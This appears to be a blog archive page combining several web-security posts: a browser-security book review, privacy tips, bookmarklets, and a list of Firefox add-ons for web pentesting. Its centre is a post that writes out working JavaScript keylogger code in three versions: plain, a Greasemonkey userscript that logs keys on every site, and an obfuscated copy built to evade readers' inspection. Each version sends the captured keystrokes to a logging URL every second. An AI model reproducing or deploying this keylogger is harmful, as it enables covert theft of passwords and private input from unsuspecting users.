The Browser Security Handbook is a free online book covering information related to web browsers like: IE6, IE7, FF2, FF3, Opera, Chrome, Safari and Android. The book covers material from url schemas, http protocol, DOM, up to same-origin policy.

Being a comprehensive document about browsers it’s a book that I would recommend security testers, as well to website developers. I wouldn’t be amazed if it where a reference lecture upon browsers in the years to follow.

If you are here you might as well check other published material from Michal Zalewski: “I don’t think I really love you” (first Zalewski material I ever read), Absence of fd-based unlink(), “Delivering signals for Fun and Profit”, Rise of the Robots, Juggling with packets, IP Fragmentation and “Strike that out, SAM”.

Having some time at hands today, I decided to make one myself. Basically I made it under three steps (was specially thought for a post). First of all this was the starting point of it, a.k.a. typical javascript keylogger:

var keys='';
document.onkeypress = function(e) {
	get = window.event?event:e;
	key = get.keyCode?get.keyCode:get.charCode;
	key = String.fromCharCode(key);
	keys+=key;
}
window.setInterval(function(){
	new Image().src = 'http://localhost/junkylogger.php?keys='+keys;
	keys = '';
}, 1000);

As you can see from the code a javascript keylogger is quite simple. Attach a function to the key pressing event, extract the character (the code of it) in the event and save it into a variable. Also declare a function (within an interval) that will send the logged keys to the backend which will save it into file/database.

As malefic as it seems you should be real lucky to succeed in using it as a relevant keylogger. It would be a good module in an XSS worm. Wanting more from a keylogger, I moved onward to GreaseMonkey which allows me to have a functional keylogger on every website I wish. Most of it it’s the same, difference is that I used GM_setValue/GM_getValue for storing the keys and had to use unsafeWindow for accesing the key pressing event.

GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
	eventobj = window.event?event:e;
	key = eventobj.keyCode?eventobj.keyCode:eventobj.charCode;
	keys = GM_getValue('keys');
	keys+= String.fromCharCode(key);
	GM_setValue('keys', keys);
}

window.setInterval(function(){
	new Image().src = 'http://localhost/junkylogger.php?keys='+GM_getValue('keys');
	GM_setValue('keys', '');
}, 1000);

download/install/view

The next step was to give it a more obfuscated look, just to give a harder life to all those who understand Javascript to the minimum and take a look at the source of the script.

window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev   = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q','');
Function('func', wind+"."+ev+" = func")(function(e) {
	e=window.event?window.event:e;
	k=e.charCode?e.charCode:e.keyCode;
	k=GM_getValue('q')+strf(k);
	GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function(){new Image().src=wrap.loc+GM_getValue('q');GM_setValue('q','')},1000);

download/install/view

No, by downloading this you won’t have all your keystrokes logged (unless someone hacked the server and replaced it) because for testing I’ve used a php file on my localhost for logging, and that remained in the examples also.

If you are new at Javascript/Userscripts the following links may be helpful to you: Dive Into GreaseMonkey, GreaseSpot and Javascript eBooks. And yes Userscripts are also available for IE/Opera…

Eleven days ago Microsoft did a disclosure on the MS09-002. Seven days later we already had a proof of concept that was used in the wild, and today having even the Metasploit exploit.

Eleven days have passed, did you patch the vulnerability? Most of the users will not have it patched too soon, even if it comes with the automatic updates. Many just simply have automatic updates turned off. Even so, there are some patches which take a long time to be released, for example the MS08-078 patch did take a while to be released.

And here comes in Exploit Shield an application which will protect your from browser based exploits (either IE or Firefox), but don’t over trust it, as soon as a patch comes out you should fix the vulnerability.

Exploit Shield is designed to shield Web browsers between the development of an exploit and the release of the vendor’s patch.

Exploit Shield posses the following functionality: Zero Day Defense, Patch-Equivalent Protection, Proactive Measures, Protects Against All Websites and Automatic Feedback.

But does it work? Of course it does, check out the detection of a MS09-002 based exploit which was catched by the heuristics incorporated in the software.

It’s also a program that would be useful when researching/coding such exploits, although the automatic submission should be disabled in that case (*grin*).

If you haven’t got it yet, you can download it from here.

Over the pass time I have collected a bunch of interesting bookmarklets, from which a couple are security oriented, more or less, and which I’d like to share with you.

jsShell – probably one of the most appreciated bookmarklets out there. Upon execution it pops up a window in which you can execute javascript code. Among it’s great features is the props() function which displays the methods/properties of a desired element, object, string, etc.

jsEval – a quick and slick way to run small pieces of javascript code.

jsEnv – useful Bookmarklet/UserScript development environmnent. For running other small scripts, I’d still recommend the jsShell.

modCookie – easy and fast cookie tampering.

formInfo – get the information about all the forms (and it’s fields) in the active page. Has the ability to swap between form methods, and to submit them from the generated page.

formReport – same as formInfo, just less colorfull :). And without the swap and submit features.

formPassword2Text – convert all password input fields to text ones.

formHidden2Text – converts input with type hidden to text.

formNoMax – remove max length restriction.

searchOnGoogle – search website via google

findRedirects – find redirects in links

findEmailLinks – find email links in page.

findLinks – scraps all the links in the page.

searchIP – searches more domains on the same IP address.

checkSecurity – check the crossdomain.xml and robots.txt files.

viewScripts – view the currently included scripts.

viewCSS – view currently included style sheets.

For these and more bookmarklets check them out on… Google -> Bookmarklets… Note: some may not work in other browsers than Firefox, like the jsShell for example…

And so you don’t think I am speaking in a hypocritical manner, I admit I strip as well a part from your privacy, with the simple Google tracker I have inside my web pages… but for those that do care about their anonymity this is not an issue.

Tor

As any other person would say, as a first step in regaining your anonymity would be installing the Tor bundle… And don’t get me that “just hackers use proxies”, because it’s not true… who would use a proxy for a %25 bonus prison time if caught? (they would use their own tunnels and proxies, not Tor networks)

There are many reasons why you would use a proxy, apart from the list which you can read on Tor projects website “Who uses Tor?“, what better way to hide your ass when trolling people?

Use Tor, if possible even help out by setting up a node, and be happy of it’s extra anonymity (which I cannot have).

Scroogle

Well, in case you are a Google user I hope you know that every search you ever do is logged… If you have a Google account you may check your whole search history here. Now you may see where Scroogle would come in pretty handy. It also comes with SSL support, so it also adds a part of privacy to it: ssl.scroogle.org.

In simple terms Scroogle does the search on Google for you, drops the cookie that Google tries to attach to your browser and prints you the output of the search.

BugMeNot

Often enough websites ask you for a user account in your attempt to access their content, even if it’s going to be your first (and last) visit on their page. Well through BugMeNot you can bypass that compulsory registration process. Why not just register?

Mailinator

In case BugMeNot didn’t have the answer for the problem (as in bypassing compulsory registration), you can quickly set up your account without having to fear spam later on. Mailinator offers you a easy one step temporary email address for any occasion, at any time you may need it.

GPG

GnuPG is the GNU project’s complete and free implementation of the OpenPGP standard as defined by RFC4880 . GnuPG allows to encrypt and sign your data and communication (…)

Using PGP encryption has many benefits, given the amount of tools built upon it.
For the browser (Firefox) you got FireGPG which let’s you sign, verify, encrypt and decrypt anything that you can select in your browser, this even includes email, posts and so fort. It also comes with implementation for Gmail.

Firefox addons

There are two addons which I know help in providing anonymity.

One would be NoScript, which I use to block trackers (like Google Analytics), but this is just a bonus for the main reason I use it, and I mean security.

The second one is RequestPolicy, which if even would look very similar to NoScript there is a finely grained difference them. I personally use both of them, and do recommend the same if you got the patience to whitelist websites you visit.

IM Encryption

The modern use of the internet is highly oriented on instant messaging, so this area of privacy should be taken care of with more interest than any other before told privacy measure.

For example the IM client Pidgin has a few privacy and security plugins from which you may choose.

As for IM clients like MSN and Yahoo! you may download (and use) BitDefender Chat Encryption for free.

More suggestions?

If there is something that you think I missed out (as in privacy and anonymity for internet users) feel free to contribute, even with alternatives for the before mentioned ones.

Before I would go further with that I should state that I appreciate very much both Firefox addons. Couldn’t imagine browsing without the two of them. And this is the reason why I’ve put up that question, because once accustomed to both of these addons you just can’t go back to old fashion browsing.

It’s one thing that some didn’t knew how to use NoScript or didn’t fully understand it’s potential, and gone to use YesScript instead, which just made me crack.

And while both sides were right, I think it all started due to a misinformation or lack of it thereof. In NoScript’s FAQ it was stated that version 1.9.2.4 white listed Giorgio Maones domains in AdBlockPlus.

Some people probably started to fork NoScript, but that for another time, when we will have something that could reach the same level of protection which NoScript brought.

Update: NoScript’s author reply on the matter.

And if you weren’t sure till know, I assure you I’m going to speak about Firefox Addons.

LiveHTTPHeaders

Useful addon for both developers and hackers. It let’s you analyze the HTTP requests and responses done at/from a specified point. It also allows you to modify the requests as you want, from parameters to HTTP headers, anything is possible.

For those that use intercepting proxies in passive mode, for grabbing links while browsing, which later will be passed to some web application scanner (or something like that), guess what: liveHTTPHeaders supports that also.

Download: liveHTTPHeaders

Tamper Data

On several occasions you may want to modify/forge requests in the first submission of a page/form. For that reason Tamper Data is another addon that shouldn’t miss from your toolbox. The functionality I mentioned is just the tip of the iceberg regarding Tamper Data.

Screenshots and download: Tamper Data

HackBar

But what if you don’t need to modify headers, just the content or parameters? Should use Tamper Data just for that?

The answer is obviously NO! Just press F9 (HackBar shortcut key) and you’re ready to tamper/forge requests as you wish. It’s a great addon not just because it eases work with long URLs, but also has the ability to send POST requests for you, thus relieving you from having another window/tab for executing forged POST requests. Did I also mentioned how helpful it can be when working with SQL Injections? No?! I wonder how could I omit that?…

Screenshots and download: HackBar

Final notes

In the end it’s up to you to decide how you’ll do from this point onward. Either work with the suggested plugins, or continue your ritual with intercepting proxies. There is no good/bad way of doing it, it’s just a matter of taste. Some people (including myself) like to do as much possible from the browser before firing up another application…

The second major thing that spread this concept was, after my opinion, the FireCAT (Firefox Catalog of Auditing Toolbox), which by now has reached it’s 1.5 version. It has many addons listed, but I think that for pen-testing the starred ones are enough. Although for experimenting you may use the others too.

If you would like to try them out, I would recommend you to create a different Firefox profile… At the high number of plugins, the browser could freeze up. You could have, for example, different profiles for different sets of addons, tasks: blogging, hacking, sharing (p2p/torrents), etc.

For creating Firefox profiles you only have to add two parameters to the command line. The command is:

firefox.exe -no-remote -ProfileManager

Or modify it in the shortcut properties, after the quotes that surround the path to the firefox.exe file. If all is fine, than at every start the Profile Manager should pop up, thus letting you choose/create/delete/rename profiles.

I think that now that you have seen some insights on this matter you would agree that Firefox may as well be the best “platform” for web application pen-testing.

Sure it’s not the only one which fulfills this scope, similar collections are: OWASP’s Ultimate Hackerfox, WAST and WAST (same name, different authors and small differences).

So why should you choose mine?

• because you like me and support me as well :)
• instead of just throwing add-ons in the collection, I’m going to give a detailed description of why those add-ons deserve their place there

Greasemonkey

One of the most innovative and popular add-ons for Firefox.

Even if attaching custom Javascript code to web pages might not seem much, the power proven this way is incredible. Such userscripts have a great versatility, leaving endless possibilities: simple to complex automation, complete modification of user interface and website working, website crawling and much more.

If you’re serious about web hacking, than you cannot ignore the power of userscripts.

Some userscripts I wrote (and you can find on this blog) are: the first userscript keylogger and form hijacker. Other userscripts I wrote about where: the malware script detector and phpinfo() security checker.

Firebug

Commonly defacto add-on for web developers but it’s utility should not be ignored by hackers alike.

• the powerful console window where custom code can be run freely (useful in initiating ajax calls, modifying functions on the fly and more)
• html window – the xpath generating feature will prove very useful when coding scrappers, also modifying html content actively is an added bonus
• script window – helpfully in intercepting/tracking/stepping through code and variables
• net window – finding (possibly exploitable): bottlenecks in code execution, external styles/libraries and let’s not forget about XHR requests monitoring as well

User Agent Switcher

There will be situations in which spoofing a browser, crawler bot will have it’s benefits :)

Tamper Data

It’s descriptions says more than enough about it:

Use tamperdata to view and modify HTTP/HTTPS headers and post parameters…

It comes better in aid when tampering post parameters either submited via: form, XHR or other add-ons.

Live HTTP headers

Besides it’s usefulness in header analysis (parameter tampering), the generator tab can be used for passive website crawling, or extraction of special type of files based on regular expression patterns.

Add N Edit Cookies

Cookie adding/modification can be done easily with a bookmarklet as I mentioned in an article about them, but this add-on gives better control over them.

Besides the sorting/filtering of cookies a very useful feature is that we can modify cookie expiration period. Imagine for example hijacking a session and the web application improperly logging out the user, setting the cookie expiration time to a value in the past instead of destroying the session.

HackBar

As many of you do, when starting pen-testing a website (manually) usually you go and tamper GET parameters and very annoying you may find the URI encoding or the length of a request.

In these scenarios HackBar is the tool you need, giving simple splitting of parameters and some primordial functions which are handful in different cases: MySQL UNION query generation, basic info column, html/javascript encoding, hashing, base64/URI encoding and more.

XSS Me

As from different collections mentioned at the beginning of the article, in WAPT the only add-on from the Exploit Me suite that I imported is XSS Me. Access Me gives doubtful results and SQL Inject Me feels redundant because most of websites either sanitize or not parameters that go in SQL statements, rarely blacklisting words like in XSS protections.

Automated XSS testing is made easy thankfully to the possibility of having custom attack vector lists. And testing with obfuscated vectors feels just better, than with the list that it comes with.

SQL Injection

This is the add-on that replaces SQL Inject Me in my collection:

it is a component to transform checkboxes, radio buttons, select elements to a input text and enable disabled elements from all forms in a page. It makes easier to test and identify SQL injection vulnerabilities in web pages.

Site Information Tool

Besides the basic WHOIS information it provides, the service behind the add-on is very useful in approximating the attack surface of injecting malicious content into the website. Take as example a look at my blog info.

Milw0rm Search Plugin

I don’t think I have to write why this plugin deserves it’s place in the collection :)

Passive Recon

Momentarily the last ad-on in WAPT, but not the less useful. Passive Recon let’s you gather data for websites using multiple services like: Google, DomainTools, SamSpade, Network-Tools, Netcraft and more.

That’s all I have to say momentarily about WAPT, hopefully you’ll find it as useful as I am so that I can surpass the others in the same category :)

The WAPT collection can be found here.